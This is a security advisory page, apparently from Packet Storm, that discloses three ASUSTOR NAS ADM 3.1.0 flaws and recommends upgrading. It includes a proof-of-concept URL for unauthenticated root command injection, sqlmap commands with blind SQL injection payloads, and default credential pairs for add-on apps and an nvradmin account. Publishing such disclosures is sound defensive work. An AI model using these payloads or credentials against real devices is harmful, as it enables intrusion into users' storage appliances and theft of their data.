exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ASUSTOR NAS ADM 3.1.0 Remote Command Execution / SQL Injection

ASUSTOR NAS ADM 3.1.0 Remote Command Execution / SQL Injection
Posted Aug 14, 2018
Authored by Kyle Lovett

ASUSTOR NAS ADM version 3.1.0 suffers from code execution and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, code execution, sql injection
advisories | CVE-2018-11509, CVE-2018-11510, CVE-2018-11511
SHA-256 | 1644681fa9ff008830ac7ddad2b94c3263d391b10d2e6962b1b9eaf1341a36be

ASUSTOR NAS ADM 3.1.0 Remote Command Execution / SQL Injection

Change Mirror Download
Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds
Vendor - https://www.asustor.com/
Patch Notes - https://download.asustor.com/download/docs/releasenotes/RN_ADM_3.1.3.RHU2.pdf

Issue: The Asustor NAS appliance on ADM 3.1.0 and before suffer from
multiple critical vulnerabilities. The vulnerabilities were submitted
to Asustor in January and February 2018. Several follow-up requests
were made in an attempt to obtain vendor acknowledgement, however no
correspondance was ever received. Nevertheless, the vendor did patch
the RCE issue in the 3.1.3 ADM release on May 31, 2018.

Resolution: Upgrade to newest Asustor firmware, ADM 3.1.3.
-----------------------------------------------------------------------------------

CVE-2018-11510
Remote Command Execution (Unauthenticated)
CWE-78 - Improper Neutralization of Special Elements used in an OS Command
ASUSTOR ADM - 3.1.0.RFQ3
------------------------------------------

Weakness : The ASUSTOR ADM 3.1.0.RFQ3 NAS portal suffers from an
unauthenticated remote code execution vulnerability in the
portal/apis/aggrecate_js.cgi file by embedding OS commands in the
'script' parameter. The application fails to santitize user input
after the cgi file executes a call to a local shell script.

Example POC:
https://<IP>:8001/portal/apis/aggrecate_js.cgi?script=launcher%22%26ls%20-ltr%26%22

Exploitation of this vulnerability allows an attacker execution of
arbitrary commands on the host operating system, as the root user,
remotely and unauthenticated. This is a complete compromise of the
appliance.

Exploits with Metasploit module can be found here:
https://github.com/mefulton/CVE-2018-11510/
------------------------------------------------------------------------------------

CVE-2018-11511
Blind SQL Injections
CWE-89: Improper Neutralization of Special Elements used in an SQL Command
ASUSTOR Photo Gallery Application - ADM 3.1.0.RFQ3
------------------------------------------

Weakness : The tree list functionality in the photo gallery
application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection
vulnerability that affects the 'album_id' or 'scope' parameter via a
photo-gallery/api/album/tree_lists/ URI.

POC
sqlmap -u "https://<IP>/photo-gallery/api/album/tree_lists/"
--data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2"
--random-agent --risk=2 --dbms=mysql

Parameter: album_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: album_id=106299411 AND
4644=4644&start=0&limit=100&order=name_asc&api=v2

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: album_id=106299411 AND
SLEEP(5)&start=0&limit=100&order=name_asc&api=v2


sqlmap -u "https://IP/photo-gallery/api/photo/search/"
--data="keyword=jpg&scope=123456789&start=0&limit=100&order=name_asc&api_mode=browse&api=v2"
--random-agent --dbms=mysql --risk=2

Parameter: scope (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: keyword=jpg&scope=106299414 AND
SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
------------------------------------------------------------------------------------

CVE-2018-11509
Default credentials and remote access (Multiple Applications)
CWE-255 Credentials Management
ASUSTOR ADM 3.1.0.RFQ3
------------------------------------------

Weakness : When the end user completes setup for the ASUSTOR Nas
appliance, a single congratulations web page appears, usually on port
80, stating setup is complete. This "setup complete" web page however
is served publicly, and is available to anyone with no authentication.
>From this page it is possible to access all of the add-on applications
the end usr installs on the NAS, which are available from their online
repository, by simply browsing to each add-on directory.

For many of these apps, for example phpmyadmin. virtualbox, owncloud,
photo-gallery, etc., the files are installed under the /volume1/Web/
folder, which is t the same directory as the 'setup complete' page is
located.

URL https://<IP>/phpmyadmin/ username/password - root:admin
URL https://<IP>/virtualbox/ username/password - admin:admin
URL https://<IP>/wordpress/ setup file available

The application does prompt the user to change the admin account for
the NAS itself, however, the end user is never prompted to change the
default passwords on the add-on applications.

This allows an attacker root level access to the application which in
turn can be used to upload a webshell onto the appliance. It also
allow access to all data the end user uploads to the NAS.

Furthermore, the NAS itself has a default account nvradmin, which has
permission to log into the admin portal. While the nvradmin account
does not have most admin permissions, it still allows an attacker to
access many of the browser file functions, and gain a foothold on the
appliance.

URL https://<IP>:8001/portal/ username/password nvradmin:nvradmin

An attacker can determine installed applications and attack default
credentials that are not changed upon NAS initialization, which
enables them to compromise end user data or gain root access on the
appliance.
-----------------------------------------------------------------------------------

[Researchers]
Kyle Lovett - (twitter - @SquirrelBuddha)
Matthew Fulton (twitter - @haqur)
https://www.purehacking.com/blog/matthew-fulton/
https://github.com/mefulton/CVE-2018-11510/

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close